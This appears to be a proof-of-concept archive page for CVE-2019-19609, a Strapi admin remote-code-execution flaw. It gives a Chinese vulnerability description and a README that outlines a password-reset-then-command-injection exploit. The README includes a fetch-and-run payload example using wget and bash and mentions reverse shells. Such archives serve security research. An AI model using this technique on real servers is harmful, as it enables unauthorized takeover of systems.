Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-19609 PoC — Strapi Admin面板Install and Uninstall Plugin组件输入验证错误漏洞

Source
Associated Vulnerability
Title:Strapi Admin面板Install and Uninstall Plugin组件输入验证错误漏洞 (CVE-2019-19609)
Description:Strapi是一套开源的无头内容管理系统(CMS)。Install and Uninstall Plugin是其中的一个安装卸载插件。 Strapi中的Admin面板的Install and Uninstall Plugin组件存在远程代码执行漏洞,该漏洞源于程序没有清理插件名。攻击者可借助‘execa’函数利用该漏洞注入并执行任意的shell命令。
Description
Strapi Framework, 3.0.0-beta.17.4
Readme
The script will try to reset the password to the one declared in the "updated_pass" variable, if it succeeds - it will give a JWT token from Strapi and use it to execute commands.
Executing bind commands won't work unless sending a reverse shell payload, with bash or python or whatever. You can generate a .sh file that will download nc for you and execute it, or anything really. Even elf. In order to do that, change the payload_exp from && to the ). For example, && $(wget xxxx -O /tmp/oooo; bash /tmp/ooo)
URL no longer active
File Snapshot

[4.0K] /data/pocs/d0d217c52f466fb59ea816d3e7bbb593c5db989e ├── [1.7K] cve_outdated.py └── [ 532] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.